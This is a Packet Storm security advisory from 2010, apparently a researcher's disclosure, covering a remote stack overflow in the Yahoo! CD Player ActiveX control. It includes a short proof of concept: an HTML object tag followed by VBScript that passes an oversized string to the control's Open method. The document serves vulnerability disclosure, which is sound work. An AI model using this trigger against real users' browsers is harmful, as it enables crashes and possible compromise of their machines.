Yahoo CD Player Overflow

2010-04-20T00:00:00
ID PACKETSTORM:88732
Type packetstorm
Reporter shinnai
Modified 2010-04-20T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
- --------------------------------------------------------------------  
Yahoo! CD Player (YoPlyCd.dll) Remote Stack Overflow  
url: http//www.yahoo.com  
  
Author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://www.shinnai.net/  
  
File: YoPlyCd.dll  
Ver.: 2000.9.7.1  
ProgID: YoPlayer.YoPlyCd.1  
Descr.: Yahoo CD Player  
  
Marked: RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: False  
  
Member: Open (other members could be vulnerable too)  
  
This was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
  
Tested on:  
Windows XP Professional SP3 with Internet Explorer 8  
Windows 2000 Professional SP4 with Internet Explorer 6  
Windows Server 2003 SP2 with Internet Explorer 8   
Windows 7 Ultimate with Internet Explorer 8  
- --------------------------------------------------------------------  
  
<object classid='clsid:5622772D-6C27-11D3-95E5-006008D14F3B' id='test'></object>  
  
<script language='vbscript'>  
  
buff = String(2097512, "A") '<- EAX changes according to the first parameter of  
' "String" function (Number As Long)  
test.open buff  
  
</script>  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.10 (MingW32)  
  
iQIcBAEBAgAGBQJLlR+yAAoJEGLxkZuDw5+sHTQP/0cy8nBvHimQxDZ9aNdzCYC1  
j1ORCl1+Edx+hjD7nL9CiazZYojLGD5iMIRdXPQXvSmuFjJEfaKiLFtB0z+W+QMj  
CA3s7kViXjGnM6QUC6fBqy/K+7IYr4zxbpEM01FxLa95I9iN2NlAAsl+rsJM8ttV  
+e+Ky0Uj6SRvELy7rALxKOZbbBEP7WFIuUVH6lLBR7rNo5IlrFurR1nzD5LPn8se  
1f3u38F1g4OkLY+EUQy4ZUVu5WAXLbrEZLWtfWx9NSYCQJl0kQPBHo+g2vGtvk4w  
Njh0AKTh5cCLwlao3BlgleC2PSAUOvkSzOgDMOpz7IlWG+ybhDXALnt08AiNLdzc  
3pX7jhUjVuCaBcWO+rmTE3jKu62tDVgG90GGzELTTA8XUNsOzsPb7Bs18Ghxvpnn  
RexlEZaEPPA/Cf/FVy9s6A6g26SwBjYh5JGoFi8H9KhJUEicvG2oiCJ4O0WXVWFy  
O/5NbK7lnJgRRa0BxXxE44ISqk/g/0HXTYy9B3S7zv8IePLu6CBCI5A+t+9YPmpT  
pxU//IFXwgW/BT5FLkl4LDNsRKaNqCuhqxcPPXC0FrEKx7mbOfi2UW9amJwNqE8s  
xI2LRqdPdsGp6zMgzAXXvA8U/vdR/DPoNNarMRj/ssqHHDFayYrfJhFo65La8bEn  
498SqmGxsvjADr0HOhbN  
=qHnA  
-----END PGP SIGNATURE-----  
  
`